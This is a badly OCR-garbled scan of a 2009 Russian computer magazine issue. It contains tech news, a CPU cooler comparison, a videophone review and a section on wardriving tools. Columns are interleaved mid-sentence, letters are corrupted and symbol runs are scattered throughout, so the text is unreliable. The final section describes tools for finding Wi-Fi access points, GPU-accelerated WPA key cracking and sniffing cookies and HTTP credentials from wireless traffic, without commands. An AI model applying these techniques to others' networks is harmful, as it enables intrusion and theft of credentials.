This document was uploaded by user and they confirmed that they have the permission to share
it. If you are author or own the copyright of this book, please report to us by using this DMCA
report form. Report DMCA
ми ее подразделениям на территории США м друrкх стран.
Корпорация rntel не несет ответственность и не осуществГ\яет проверку добросовестности иГ\и достоверности каких-Г\ибо утверждений иГ\и эаявГ\ений относитеГ\ьно конкретных компьютерных систем, упоминание о которых содержится в данном документе.
Iпtеl, Intel, lmel Соге, Iпtеllпsidе,flОГОТИП Intellnslde, Iпtеl ViIV, Intel \IРщltаПlum, Itanium \nside. и Хеоп IПSldе яв!\яются товаРНЫI~И знака~IИ права на которые принад~,ежат корпорации Intel на территоplo1И США и других стран.
Ноут6укдляшкольников
ИСLудентов
Компания Dеllанонсировала
обстоит следующим образом: про
ноутбук на базе чипсета lпtеl's
цессор IntelAtom
945GSE. ориентированный на
1.6 ГГц; до 1 ГБ оперативки [плюс
«учебной сегмент рынка»
дополнительный слот, с возмож
модель
Latltude 2100 Понимая
особенности аудитории.
I
N270 частотой
ностью рвсширения памяти до
2 ГБ]; LED-экран 1024х576, или
Dell
оснастили машинку прорезинен
опциональный тачскрин; жесткий
ным корпусом, который позволит
диск емкостью до 250 ГБ. или SSD
избежать царапин и других ме
дО
ханическихповреждений [этому
адаптер; WIFh-\одуль. и, наконец,
'16 ГБ; гигабитный сетевой
поспособствуети отсутствие
кард-ридер 3-в-1 для SD\MMC
вентиляционныхотверсщй на
карт. Также на выбор пользовате
нижней стороне Kopnycaj, клави
лю предоставяттри разных ОС
атурой с антибактериальным пок
Windows ХР Ноте. Windows Vista
рытием и опциональным ремнем
или Liпuх UЬuпtu. Окончательная
для переноски на плече. Цветовых
цена ноутбука, разумеется, будет
решений будет
зависеть от комплектации, но уже
5: красный. жел
тый, синий, зеленый и графито
известно, что минимальная его
вый. Техническая же сторона дела
стоимость составит369 долларов.
_
........
"~_~~"
•
.•. ....-_..•• , •• _.,-. _.••
~_._-~'
... --r
. .
_~."
•.. _, __ •.••
,_.".w•...
Книга ЖЖалоб и
предлоЖЖений
~
,tQ:Q&lJ~.ОI']N; ... :fC.1:t-:·Ik~>I~lnCfО. ...
~~:Х>F.<-(!>,,~tSIl(Ij;t)
'" "8r.... L.~ or~ ...·· ~ "t'OC"".J~p~
~~~.:::~~-::=::--.
--,., ....... ..........
_'
~~:s-=:::=':':-
;:~~~-:!:=."-,
/'
/r;-'1"~ ...,.,~
,i(!/p.,~ "tf.-,I.
/,,", 1{V ~.;'/-" (J !' 'f"l СУ L 1 'n" ft· . )~. {~ '1
>,,-
.~,
~~
Мы уже писали отом, что президент рф
пришлось возлагать буквально к забору. Каково
Дм итри й АнатольевичМедведевтеп ерь ведет
же было всеобщее удивление, когда 15-го
блог не только на
числа на комментарий был дан ответ со сканом
kremlin.ru,
но и в ЖЖ. куда
дублируютсязаписи с правительственного
официального документа, подписанного
портала Но кто бы мог подумать, что президент
президентом РФ. Бумага содержала изначаль
станет отвечать на ком менты В журнале, да еще
ный текст комментария-жалобы и следующую
как! После лразднованиядня Великой Победы,
приписку от руки: «А.Н. Ткачеву: Разберитесь.
1О-го мая. в блоге первого лица государс
Накажите виновных. Доложите в трехдневный
тва появился комментарий. в котором юзер
срок». Дата, подпись. Пару дней спустя в пресс
voda_IJyba жаловался на власти Краснодара
службе президента подтвердили, что поруче
Из-за них вечный огонь в городе реконструи
ние действительно было передано губернатору
руютуже более полугода, и вдень памяти цветы
Александру Ткачеву.
DDoS-атака в реале Страсти
BOKpyrThe Pirate Вау и не думают стихать. Хакеры со всего мира продолжа
ют строить каверзы компаниям и организациямобвинителямтрекера, Пиратская партия Швеции из-за громкого процесса набрала невиданную мощь итеперь имеет все шансы пройти в Европарламент, противники копирайта активно протестуют, а сами админы ресурса держатся молодцом Так, Готфрид Свартхольм, уже и без
того известный миру как парень неробкого десятка (И,l.1енно он отвечал на гневные
письма правообладателей, не скрывая сарказма и ехидстваl, предложил устроить сообразную DDoS-атаку на адвокатскую фирму Danowsky
& Рагtпеrs.
Именно они
защищают интересы медиа-магна1·ОВ. Готфрид призвал народ, в знак «огромной
признательности» этим людям, перевести на их банковский счет
1 шведскую крону.
Вся соль в том, что после тысячи платежей банк начнет взимать с фирмы комиссию
за каждый последующий платеж, в размере
2 крон. Более того, обработка таких
«поступлений» В адвокатской конторе осуществляется вручную и сопряжена с
маранием кучи бумаг, а штату фирмы совсем небольшой. Но Свартхольму и этого показалось недостаточно. Особо ретивым борцам за справедливость он прецложил отозвать свой перевод обратноl Свою месть Готфрид окрестил просто
- «распреде
ленной атакой на отказ вдолларах» или, сокращенно, DDo$-атакоЙ. Как в Dano\Nsky
& Part.ners справляются с таким
~
010
валом переводов, пока неизвестно.
XAI(EP 06 1'11.6/ 09
РС27
Фnешкасо
_..--.--- Асе
\
\\.
\
\
встроенным антивирусом
\\
I(омпании
Transcend и Trend Micro решили радикальног;одойти к проблемезара
JetFLash V15 AntiVirus USB Flash Orive со встроенным антивирусом Т rend Micro USB Security. Девайс защитит от заражения и порчи какхранящиеся на нем данные, так и П К, к которому производится подключение. Встроенный антивирус проверит каждый передаваемыйфайл и в случае обнаружения малваря -
\'\
предупредит юзера и помес
тит файлы на карантин. Флеш-драйв будет поставляться с уже предустановленным Т rend Micro USB Sесuпtу и бесплатным триалом на
90 дней.
Обновление антивирус
ных баз будет производиться автоматически. 80 время подключений к компьютерус
\ \
выходом винтернет.
ПО ДАННЫМ ПРОЕКТАRUМЕТРИКА,
С_.' ~
440/0 РОССИЙСКИХ ЮЗЕ РОВ НЕ ГОТОВЫ
~ . •..
ПЕРЕСТАТЬ ЮЗАТЬ И-НЕТ, ДАЖЕ ЕСЛИ У НИХ
НЕ БУДЕТ ХВАТАТЬ ДЕНЕГ НА ЕДУ И ОДЕ}f{ДУ.
Им не нужна твоя одежда и Пока
отоцикл.
Пока в кинотеатрах крутят нового "Терминатора», где робо ты с людьми бьются за место под солнцем, роботы вполне "успешно» нападают на людей уже сегодня, и далеко не в кино. Например. в Швеции, еще в
2007 году. работник
Сток
гольмской фабрики Больста едва не погиб, осуществляя техобслуживание поврежденной машины, использовав
шейся для перетаскивания тяжелых камней. Будучи уверен, что робот отключен, рабочий оказался совсем не готов К тому, что машина внезапно схватит его за голову и попыта
ется поступить с ней так, как обычно поступает с камнями. В результате инцидента мужчина получил серьезныетравlo-\Ы,
а частности, сломал четыре ребра и, согласно Io-\едицинским
заключениям, был действительно близок к Сlo-\ерти И 80Т, спустя два года, потерпевший все же решился подать в суд
и потребовал у СВОИХ бывших работодателей 25 000 крон 1$30001. Но более интересно то, что его иск удовлетв ори ли, а прокурор приэнался журналистам, что: "Никогда не слышал, чтобы робот вот та к на кого-нибудь нападал». И хотя понятно, что вданном случае речь идет о банальном
несоблюдении техники безопасности, а не о «восстании машин», такого рода «первые ласточки'> все равно выглядят неслишком приятно.
GOOGLE БОРЕТСЯ ЗА ЧИСТОТУ ОКРУЖАЮЩЕЙ СРЕДЫ, ПОЭТОМУ ВМЕСТО ГАЗОНОКОСИЛОКДЛЯ СТРИЖКИ ГАЗОНОВ, КОМПАНИЯ «ВЗЯЛА НА РАБОТУ»
Новая серия мониторов от компании но носит приставку
LG ~ W5З. совершенно заслужен
SMART. Full Н О дисплеи С разрешением 1920хl ова.
соотношением сторон экрана
16:9,
динамической контрастностью
50.000:1 и временем отклика 2 мс, оснащены такими функциями как Auto BГlght. Time Сопtгоl, Сiпегпа Mode и Live Sensor. ЭТО значит, что монитор будет способен автоматически регулироватьяркость и другие настройки картинки, в за8ИСИМОСТИ от степени освещенности комнаты,
или же в зависимости ОТ контента на экране Iчем темнее картинка, тем светлее экран, и наоборот]. Также стоит заметить. что эта опция существенно сократит расход энергии,
снижая интенсивностьлампы подсветки. Функция Сiпеmа
Mode поэ
волит без проблем смотреть видео в онлайне, не отвлекаясь при зтом на яркую рекламу и другие раздражители
-
монитор автоматически
затемнит все, кроме выбранного об"Ьекта. Благодаря
T,me СопtгоL,
можно будет настроить специальный таймер, который раз в
1-2
часа
будет напоминать, что пора отдохнуть от работы эа компьютером И. наконец, сенсорная панель управления L,ve Sепsог автоматически распознает приближение руки и аКТИ8ируе'г подсветку на лицевой
панели монитора. облегчая по.иск кнопок. В серию войдут три модели:
W225ЗV[21.5"j. W225ЗТQ[21.5"j и W2'15ЗV!27"J. в Гlродаже мониторы появится уже В этом месяце, ОриеНТИРО80чнаяцена составит 80аа рублей.
Intelvs
АМО,6 продо
тва жает я
Конкуренция между «верными врагами» -
Inte!
Дурной пример
заразителен
ственности собрались итальянцы. Стоит
отметить, что бороться с трекером в Ита
и АМО,
лии уже пытались
тогда провайдера м
-
похоже, может остаться в прошлом только В ОдНОМ
страны попросту приказали прикрыть к
случае, если одна из компаний прекратитсвоесущест
нему доступ, но команда ТРВ обратилась
вование. Гиганты продолжаютрасстаВЛfПЬ капкан ы
в суд и оспорила незаконную блоки ров
друг на друга, и срабатываютэти ловушки порой лишь
ку. Теперьже против админов трекера
спустя долгое время Так недавно «выстрелило ружье»,
собираются выдви нуть 'ге же обвинения,
висевшее на стене с
что совсем недавно звучали и в их родной
2000 года. Именно тогда предста
вители АМО пожаловались Еврокомиссии, что
Швеции. Какие именно улики собираются
Intel.
якобы, приплачивает некоторым производителям, что
Антипиратское лобби всех европ ейских
предъявлять итальянцы и как повернется
бы те отказывались от использования В своих продуктах
стран БУКGально ликуетпосле вынесения
ситуация, сучетом того, что ТРВ не имеет
чиповАМО. Было начато расследование, и закончилось
приговора поделу команды
оно лишь недавно. По его результатам Еврокомиссия
Вау Но некоторым, похоже, не терпится
совсем ясно. Какая-то кон кретика по этому
вынесла неутешительныйдля
повторить успех Швеции лично. Стало
вопросудолжна появиться вближайшие
известно, что теперь при влечь команду
пару месяцев, и тогда же станет известно,
многострадального трекера к ответ
бытьли этому суду вообще.
Intel
вердикт
вину ком
пании, очевидно, смогли доказать и приговорили
Intel к
штрафу в размере 1.060 миллиарда евро, за нарушение антимонопол ьного законодательства Евросоюза. Сумма штрафа является настоящим
peKopAotJ"
но совсем не
факт, Чl'О IпtеLдействительно придется платить. Для начала будет подана апелляция, эатем последует еще не одно судебное разбирательство, и ка ков будет окончательный итог, сказать крайне сложно. Президент
The Pirate
к Италии никакого отношения, пока не
НОВЫЙ [ридер
oTAmazon
АМО Дирк Мейер, однако, настроен оптимистически
Устройства для чтения электронных
Klnd!e2 [равно как и для его предшес
и заявляет: «АМО была неуклонным лидером по части
книжекзавоевываютвнародевсеболь
твенника] не существует, зарегистри
технологических инноваций, и мы страмимся перейти
шую популярность, а спрос, как извес
ровать устройство на
из мира, в котором правила корпорация Iпtеl, в мир, В
тно,рождаетпредложение.Компания
проблемно, а воспольэоваться WiFi и
котором правят потребители».
Amazon выпустила вторую версию своей
интернетом вне США не получится. Тем
читалки KlndLe
не менее, возможно. когда-нибудь мы
Amazon KindLe 2. Так
Amazon. сот тоже
ка к большинпво ридеров на сегодня
все же дождемся официальных продаж,
имеют экран
и тогда тебе пригодится информация о
6" с разрешением600х800,
чтение на них технической или учебной
TO~~, что цена на
литературы, а также комиксовдоволь
$35900, а на 9.7" - $489.00.
6"
модель составляет
но затруднительно.Проиэводители, наконец, решили учесть этот нюанс
- Klndle2 вышел в двух вариантах, уже привычном 6-дюмовом и
9, 7-ДЮЙtJ.овом
!Кiпdlе OXI, с поддержкой POF. Экраны
E-Ink
последнего поко
ления обеспечат передачу 16-ти оттенков серого, а разрешение
КiпdLе ОХ составит 1200х824. За счет скругления углов вторая
КОМПАНИЯ MCAFEE СООБЩАЕТ, ЧТО КОЛИЧЕСТВО IР-АДРЕСОВ, ИСПОЛЬЗУЕМЫХ
но тут все эависитот фантазии. Единственная загвоздка в том, что серверная часть про
граммы написана на основе библиотеки
BTFramework и будет работатьисключительно со стандартнымидрайверами Windows для Bluelooth. Если ты установишьдрова с диска, который шел ствоимдонглом,или программу
---
Bluesoleil, то ничего не
получится.
-§~
-~O О Распознавание музыки
5hazamID - зто одна из моихлюбимых программ для телефона, которой
О Безопасность
С появлением возможности редактировать файлы или удаленно кон
я пользуюсь чутьли не каждый день. Идея простая I Если где-то в кафе,
нектиться к серверам, кданным на телефоне стоит относиться с особой
по радио да неважно, где еще, заиграла прикольная композиция, то
осторожностью. Небольшая тулза
можно очень просто узнать, что зто. Включаешь 5hazагпID
ключом зашифроватьлюбые папки или файлы. Теперь, чтобы открыть
-
'га запи
Best
Cгypto позволит 256-битным
сы вает небол ьшой семпл, отправляет его на сервер и уже через пару
их, потребуется ввести пароль или сложную парольную фраэу. Другая
секунд, скорее всего, покажет тебе имя исполнителя, названиетрека и
утилита
даже обложку альбома I
безопасный РРТР-канал до VPN-сервера. А это, кстати, еще и способ
symvpn
поможет защитить данные от перехвата, устанавливая
сохранить анонимность.
О Разговаривай бесплатно
Ощутив раз всю жестокость международного [да и междугороднего роу мингаl, желание разговаривать в «чужой» СОТОВОЙ сети сильно притупля
О Альтернативныйплеер
Если скины стандантного плеера, восьми эквалайзеров, способных
ется. Но когда в распоряжении есть смартфон с Wi-Fi, о подобных затратах
изменять звук до неузнаваемости, и вообще, 80 всех отношениях при
можно забыть, уста н оаи в замечательную программу Fгiпg. Подкл ючив
ятный плеер платформы
шись К ближайшему хот-с поту Iв кафешке или гостинице), 'ГЫ можешь
могупосоветоватьтолькоодно
[прежде всего, Skype) или звонки ПО любым номерам за сущие копейки
560 Featuгe Расk2тебя вдругне устраивает, - OggPlay. Помимо большого числа поддерживаемых форматов [новомодные ogg, .oga, .flac и, конечно же, .mp3i, у плеера есть еще две удобных опции. Первое - настраиваемые горячие клавиши. И второе - автоматический поиск файлов для вос
\вплоть до бесплатных на городские в Москве и Питереl. Причем для
произведения 8 НУЖНОЙ папке, избавляющий от геморроя с составле
тебя такой звонок ничем отличаться не будет, крометого, что весь трафик
нием плейлистов при каждой эагрузке новой музыки.
позвонить куда угодно, используя все возможности VoIP- телефонии. А что зто значит? Все просто: бесплатные звонки на такой же VolP-клиент
пойдет не через дорогостоящий
GSM, а
через
WI-FI.
I'ТЕМПЕРАТУРА. (
7'~
Zerotherm ZE,N FZ120 (1800 об/мин]
Zerotherm ZEN FZ120 1'1400 об/мин]
Xilence BLack Hawk Edition i 1400 об/мин)
Xilence Black Hawk Edition (1800 об/минl
Thermalright Ultra 120 extreme (1400 об/минl
Thermalright IFX-14 (2 вентилятора 1400 об/минl
Thermalright IFX-14!1 вентилятор 1400 об/мин
Noctua NH-(12P [1400 об/мин]
Ice Наттег 114-4405 (1650 об/мин]
Ice Ha'mmer IH-4405 !1400 об/мин]
о
5 1О 15 20 25 30 35 40 45 50
ХОЛОД
РЕШАЕТВСЕ
Сравнениеохлаждающихсистем для проц,ессоров
Качество укладки элементов в микросбарках и микросхемах непре рывно увеличивается, а вот большинство систем охлаждения до не
давнего времени отставали в своем развитии. Пора наверстать упу
щенное! Мы отобрали несколько разработок в этой области и рады представить их тебе. НЕСКОЛЬКО
ПО,КОЛЕНИЙ КУЛЕРОВ
всерьез задумались о снижении гютребляемой
крепления, габариты, теплоотвод и т.д,] дейс
мощности, так как чисто экстенсивное развитие
твительно хорошо сбалансированы!
Еслиуж речь зашла о модернизациисистем
стало себя исчерпывать. Та же ситуация произош
охлаждения,то полезно вспомнитьновей шую
лa скулерами
историю их развития, Начнем приблизительно
весьсистемный блок
-
делать вентиляторы размером с
- зто, всеже, глупость.
Phenom Х4 9950, у которого максимальная мощ
года этаксдвухтысячного.Мощные кулеры стали
Примерно С
устанавливатьна процессоры InteL. начиная
ляться нововведения втехнике охлаждения.
с Репtium 111. Чуть раньше они появились на
Во-первых. жидкостные системы, как бо
140 Вт. Отметим, что стенд. на котором ПРОVlЗ80
разработках АМD.
лее тихие, эавоевали большее количество
дилось тесги рование, был открытым
каждого транзистора Icледовательно, и всего
ПОКГОННИКОG, нежели было прежде. Однако зто
случае мы отсекаем возможную дополнительную погрешносгъ, вызванную нагревом корпуса.
- поскольку энерговыделение
2006 года начинаютмассово появ
МЕТОДИКА ТЕСТИРОВАНИЯ Для теста ~~ы взяли4-ядерныйпроцессорАМD
ность рассеивания соcrавляет приблизительно
- в этом
процессора! у них было больше, нежели у "пенти
экзотика. В основном начали входить в жизнь
умов». Чуть позже они эту проблему испраВИЛI~.
более теплопроводные материалы; увеличива
Конечно, термопаста существенно ВЛVlяетна
Изначально система охлаждения была проста,
лись площади радиаторов Iза счетуменьшения
отвод тепла, поскольку обладает собственным
как гвоздь - брался радиатор [как правило,
толщины пластин и увеличения их количества),
тепловым сопротивлением на границах сред(тем
алюминиевыйl и на негоустанавливался не·
применялись тепловодные трубки и пра виль
не менее. оно меньше. чем тепловое сопротивле
большой вентилятор. В принципе, общая схема
ная организация притока и оттока воздуха
ние раздела процессор-радиаторJ. Для объектив
прослеживается и В сегодняшних ~юделях,
через корпус- раньше об этом если и думали,
ности мы использовали одну и туже пасту на всех
однако нынешние
то не сильно. И буквально год назад началVl
кулерах
тельны при сравнимых размерах
появляться модели, которые действительно
Самтестпроизводился утилитой S&M С помо
Примерно в 2004 году начали появляться
можно назвать кулерами нового поколения
щью нее мы нагревали процессор втечениеЗО
кулеры-монстры, моду на которые стал задавать
В них большинство характеристик [материал,
- гораздо более производи
Therma ltake. Одна ко а погеем стал, пожаЛУЙ, 2007- й.
Noctua NT-H1
минут. Тихие кулеры без регулировки вращения оцен ивались лишь в одном режиме, более
Поддержива емы е п роцессоры' АМ О 50cket АМ2/АМ2"', Intel LGA775/
Материал подошвы: медь
LGA1з66 (с пом о щью доп. а кс ессуа ра I
КоличествотеПЛО8ЫХтрубок: 5
Материал подошвы. медь
4
Диаметр тепловыпрубок, MM~ 6
Количествотепловых трубок:
Диаметр вентилятора, мм: 120
Диаметртепловыхтрубок, мм:
Скоростьвращения вентилятора,об/4ИН: 1000-2000
ДиаfАетр вентилятора, мм. ЗХ 120 (в комплект не входят]
8
Уровень шума: 19-32 дБ
Скорость вращения вентилятора, об/мин- п/а
Поток воздуха, CFM: 55.6-ВО.1
Уровень шума: n/a
Поддержка PWM. нет
Поток воздуха, CFM· /па
Габариты. мм . 125Х105Х150
Поддержка PWM п/а
Вес, Г: 79В
Габариты, мм 146Х126Х161
Вес, г· 790
••••••••• 0
••••••••••
Начнем с плюсов. Во-первых, технология НОТ [Неаtрtре-Оlгесt- Touchl, суть которой состоит в том. чТо тепловые трубки подходят как раз к плоскости контакта процессора и радиатора Это улучшаеттеплообмен
•
Кулер оказался лучшим среди рассмотренных в тесте Всего 36 градусов
при обдуве одним [11 радиаТОР04 диаметром
120 мм - это очень сильный
в саМИА куле ре Основание радиатора выполнено из меди, а вентилятор
результат Вместе с радиаТОРОfА никаких вентиляторов В комплекте нет
устройства имеет девятьлопастей. Скорость их вращения изменяется
(хотя есть посадочные места аж для четырех), но зато присутствует IFX-1 О
8 пределах от 850 до
1650 об/мин Iчто, вообще говоря, противоречит
- дополнительный радиатор для охлаждения обратной стороны сис
официальным данным). Крометого, на радиатор можноустаНО8итьеще
темной платы Мы установили на радиатор
один, дополнительный вентилиор В комплекте скулером идеттюбик с
Antec
IFX-14 одну 120 мм вертушку Tr'iCoollEO и, тем не менее, получили наилучшие результаты. IFX-1 О также есть кулер, хотя во время 'геста мы его ВЫКJIючали, чтобы
термопастой Такая щедрость для подобной цены' .. По ТТХхарактерис
На
тики термопасты таковы: теплопроводность более 75 Вт/(м*К], тепловое
оценить именно процессорный охладитель.
СОПРОтивлениеменее 0.06 К/Вт - Очень неплохо. ведь термопаста на
25% состоит из серебра. Представляется сомнительными полезность и удобность
IFX-l О,
пос
кольку использовать его можно далеко не всегда. Намного логичнее Из fАИНУС08замечен сильный шум на больших оборотах.
ХАКЕР
06/116/09
выглядел бы хороший вентилятор на кулере.
~
019
T'hermaLright Ultra-120 eXtreme
Xite:nce Black Hawk Edition Техническиехарактермстмки:
KaMepa:VGA,640x480 Интерфейсы: Ethernet, 802.11 b/g Габариты: 202 х 12Зх25З мм Вес 1,6кг
~
022
ХАКЕР
06 /126/ 09
Пользоваться
Skype становиться, так же
привычно, как обладать со
товым телефоном. Интернет-теле'Фония обладает массой достоинств:
" она бесплатна, хорошее качество звука и изображения, возможность обмена текстовой информацией или файлами, доступность телекон
ференций. Неудивительно, что компания
ASUS
решила предложить
нам еще один девайс для связи с абонентами без использования ком пьютера.
ЧТО ОН МОЖЕТ?
гаджет, мы приступили к настрой
пользоваться. Организовать
можно по видеосвяэи
Гаджет под именем ASUS AiGuru
ке, Разговорс устройствомна
телеконференцию тоже ~~ожно,
но? Кроме того, такой девайс
английскомязыке не вызывает
но без мышки - тяжеловато. Еще
крайне пригодится, если утебя
восторга, но в данной прошивке
одно огорчение нас ожидало при
имеется брат или сестра, крайне
русскогоязыка ,;е имелось. Введя
загрузке списка контактов: все
словоохотливые и имеющие
попу.лярность, а доступность ши
логин и пароль [если утебя их нет,
русские ники не отображались, как
массудрузей в Сети. Чтобы он или
рокополосного интернета сделала
тоты сможешыутжезарегис
и присылаемые сообщения. На
она не занимали компьютер, ты
SVl
создан для разговоров при
помощи интернет-телефонии от
Skype.
Программа уже обрела
аффект
трироватьсяl,~Ш принялись
iial;HOM зтапе девайс совершенно
просто подключаешь видеофон по
ниться кдругучерез интернет, чем
названиватьзнакомым. Громкость
не дружит С русскими шрифтами
беспроводной связи и отправля
ждать, пока он оторвется от компа
динамика и чувствительность
'у нас был демонстрационный
ешь родственничка в соседнюю
и найдетсвою трубу дo~~a. Неко
микрофона порадовали,но мы
образец, будем надеяться, что
комнату: для тебя -
торые пользовател и обзаводятся
так И не встретили регулировки
видеофон появится 8 продаже с
спокойно посидеть перед компом,
web-камерами и тогда уже можно
микрофона.А вот качество картин
нормальной руссификациейl Раз
а для нее или него
устраивать видео конференции.
ки встроенной камеры откро
уж м ы затронули тему управления
вастаться новой игрушкой перед
С80е дело
-
теперь проще ДОЗ80
возможн ость
-
П080Д пох
Но все зто стаНО8иТСЯ недоступ
венно разочаровало'при любом
кнопками, то нельзя неупо~~януть
друзьями. Ктомуже, ты можешь
ным, как только ты выключишь
освещении и л юбых настройках
об зргономике в целом Здесь
всегда оставаться на связи, даже с
свой компьютер
изображениеможно назвать не
можно только порадоваться
выключенным компьютером
Этот девайс
более, чем удовлетворительным,
Устройство очень устойчивое, а
жешь организовать консультации
большой компьютер, заточенный
ТЫ можешь поигратьс ползунками
панель СДИСГlЛеем наклоняется
по Сети, а параллелыiO работать
под одну еДИНСТЕен ную задачу:
яркости, контрастностии еще
ОТI~осительно ОСI~ования. В самом
на компьютере, не занимая окном
обеспечить удобство переговоров.
задеЙСТВО8атьпяток других, но
основании спрятан аккумулятор,
скайпа драгоценную площадь
Встроенный динамик и микрофон
это не особо помогает, Фокуси
который обеспечивает не очень
дисплея.
позволят обойтись без гарниту
ровка не изменяется и придется
длительную автономную работу.
ры, но при необходимости ты их
довольствоватьсяустановками по
Кнопок немного и все они доволь
ИТОГ
сможешь подключить. КоличеСТ80
умолчанию. Попытка подключить
но крупные, так что даже в темноте
в качестве итога можем собрать
кнопок сведено к мини~~у~~у, так
ся к роутеру по W,-Fi не увенчалась
п ромахнуться будет сложно.
все впе4атления и рассказать
что ты сможешь работать без
успехом. Немного поразмыслив,
затруд·нениЙ. Дина ми к довол ьн О
мы отключили шифрование и тог
громкий, а регулироватьуровень
да девайс смог подцепиться. Но
НАХОДИМ ПРИМЕНЕНИIE
итутне все гладко прошло. даже
Стильный и зргономичныйдевайс
-
сам по себе не
звука ты сможешьдаже
80
время
-
мо
о чувствах, которые вызывает
этот деваЙс. 8идеофон несет нам простоту коммуникаций не только голосом, но и при помощи
разговора. Кроме того, девайс
при вкл Ю4енном О НСР гаджет не
можно использовать [хотя и не на
изображения. Работать стало
оснащен собственным аккумуля
смог автоматически прописать
полную катушку, как зто делается
действительно легко и с этим
тором, и ты сможешь быть незави
все адреса и пришлось зто делать
на компьютереl. Но где же он мо
спра8ИТСЯ даже твоя прабабушка,
симым от розетки около получа са
вручную Вероятно,проблему
жет найти свое применение? Если
если ты все настроишь. Но есть
разговора.
удастся решить с выходом новых
ты приверженец ноутбуков, то
некоторые недоработки, вроде
По функциям самой программы
прошивок. После подключения
врядли потерпишь на своем столе
отсутствия поддержки шифро
Skype ничего не изменилось: ты
все заработало довольно стабиль
нагромождение пластика и злек
вания при подключении по Wi-Fi
также, как И прежде, можешь
но и шустро. Но тут мЫ столкнулись
тронной начинки. Если же утебя
или невозможностиработы с
добавлять новых пользователей,
с еще одной проблемой -
стандартный десктоп, тотакже
кириллицей.Кроме того, видео
открывать чаты и организовывать
текста Глядя на довольно крупный
может не найтись места на столе.
фон, основной функцией которого
телеконференции.
дисплей, было бы логично пред
Но когда в твоей организации
является как раэ передача изоб
положить, что он будет сенсорным,
решат, что нужна свяэьдешевая,
ражения, должен демонстриро
НАЧИНАЕМ ТЕСТИРОВАНИЕ
но зто не так. Все цифры, символы
качественная иудобная, то вполне
вать картинку если не идеальную,
и БУК8Ы приходится наб и рать
можно вспом нить О видеофоне.
то очень высокого качеСТ8а, чего
Включив девайс мы сразу же
при помощи пятипозиционной
Замечено, что директора и ТОП
мы, к сожалению,не наблюдали,
решили подключиться к Сети.
кноп ки Так что, если тебе надо
менеджмент любят различные ус
В остальном же, гаджетдовольно
Первымделом мы подключили
добавить нового пользователя
тройства, которые подчеркивают
интересныйи будет пользоваться популярностью,особенно если
ASUSAiGuru SVl
26/09
-
по Еthегпеt-ин
набор
или сформировать список або
значимость. Например, позвонить
терфейсу. Обвязавшись кабелем
нентов, то проще зто 6удетсд~лать
секретарше и попросить кофе
цена опустится хотя бы до трех
и установив на удобном месте
с компьютера, а потом просто
можно по обычномутелефону, а
тысяч рублей. I
ХАКЕР
06 /'1261 09
~
023
{
~'
"
»
pc:_zone "
Netstumbleг
~
'
www.stumbler.net Определенно один из самых известных и лучших инструментов для вардрайвинга. У стемблера всего одна задача -
itJ··""
обнаРУЖI1ТЬ в эфире точки
-
-
~-.IL\J Chaмelt
.
МАе
@ 00045дЕВ4З61 О 00022DOECFI5
SSID.
ffi·~? Fiael~
доступа. считать SSID и за писать полученную
@ОО601DIЕЗ~ОО О00ЗlJ05150Э0F
информацию Е логфайл вместе с координатами,
@OOO22DOADA68
если к програМ'Ае подключен приемник
®
00045АЕfЗ855 @ООЗ065026DЗВ @ООО22DОЗ7С57 @О090480В358Е @ 00О22DОD848З О 00045AD1Ef4D О 0002202DOCFO @ 004005DЕDAЗF
GPS.
После удачного вардраЙЕИНга информацию О
найденных АР-шках месте с данными о местора сположении можно ЭКСПОрТИрОЕать Е lоg-файл, преобразовать его с помощью многочисленных конверторов в понятный
Google'y формат KML
000=278311
и
SSID
H:h"" I VendOl
I
JGKAirPot-' net",...ork
,
АР
1
P,o>Cim (Agm>/W.,.IJ>.N)
АР
i!9g, JMI«Ai, ( John TaybI
10 1
АР!'!&
АР АР
johп.linщ..
Э
Jon'$ Home JPAppje NetWOEk \IIreJers
1 9
l'Io,im (Age,.j ORiHOCO Unk'Y' Apple P,,,,,,m {Ag-J OR;NDCO
гепооtе ассеSS/'о'.'iгеlеss/gепегаl info/acu.html]. А есть ли смысл его устанавливать? Конечноl Несмотря на npo думаннооь протокола, даже в нем обнаружили уязвимо
i'
вать только то, что нужно, А настраиваемые аfWSAPf<>jЩ.-Е'Q<'rU,()ftWttеleы.~I)'k.>d,'!Or "'eAt6D...
~_!!"!,,
~
(r~~(f~
OV~n;<~;«!
f,"jO:<;!
~J·,.,"":,,nl ~'~Jt~!
itJ~.r..<\';
11'''0.. _1:
~O
~},.o.~"I~, "P'~~~
,_11II.:
QIoOdO",6In.:4-'I
ЧЕННЫЕ С ПОМОЩЬЮWIFIZОО
1-kl91"~">
tl'/(II1~","II:51J
AV'""~rj>te
'''~ .~
1'JZlII
1'Io:><...... Io=00±
~IIXЦ
•
~2'"~ ...""~ ,..,:;==---=---,_,
.....
, Sti:!
0rbJ<
A~.
Ot:t!I:i
Ow.;"
компенсируется предварительнозапущенным
Кismet'o,~. Перехваченныеданные утилита
бережливо складывает в папку logsl. ука
WSA
гию, которая в
использует техноло
процессе восстановле
акселераторы. Тут надо сказать, что 1,
.,~~--=~=·E=~:·~·,.,:,,". .~~ ?! ;:~:~::~~=
процессора,
ния ключа задействует графические
,
С!rщ.
СПЕЦИАЛЬНАЯВЕРСИЯСНИФЕРА COMMVIEW ДЛЯ РАБОТЫ В БЕС ПРОВОДНЫХ СЕТЯХ
ПРОСМАТРИВАЕМ ЧЕРЕЗ GШ
И!НТЕрФЕЙС КУКИСЫ, ПЕiPЕХВА
__ ~
'~~.'iii~
~~'~2mJOO.r'L2GRJ<:8~']
'::-:---------~._-----~:;,.:..
ПО ЗАЯВЛЕНИЮ РАЗРАБОТЧИ КОВ, СКОРОСТЬ ПОДБОРА WPA КЛЮЧАМОЖЕТВОЗРАСТИ В РАЗЫ, ЕСЛИ ИСПОЛЬЗОВАТЬ ВОЗМОЖНОСТИСОВРЕМЕННЫХ ГРАФИЧЕСКИХАКСЕЛЕРАТОРОВ
сама програМlo1а не
перехватыеает тра
фик иэ беспроводной се'ГИ, а имеет дело только с дампом сетевых сообщений
[поддерживаются форматы TCPOUMP,
CommView. PSPR). Т.е работает в связ ке со снифером. Важно, что для уско рения вычислений подойдет вовсе не любая карта, а только топовые модели
ускорителей: NVIDIA IGeForce 8.9.200 и
вышеl или ATI (RADEON НО 3000 Series
зывая в названии файлов источник данных
и BbIIJJe)
(SSlds,log, cookles.log, hllpauth log и т,д.]. А
словарю и
EWSA поддерживает атаки по поддерживает реЖИI1Ы мута
для большего удобства в комплекте идет
предупреждения поэволяют сообщать поль
ции пароля Iнапри,~ер, слово password
GUI-интерфейс, реалv.зованныЙ в виде веб
зователю о важных событиях, таких как подо
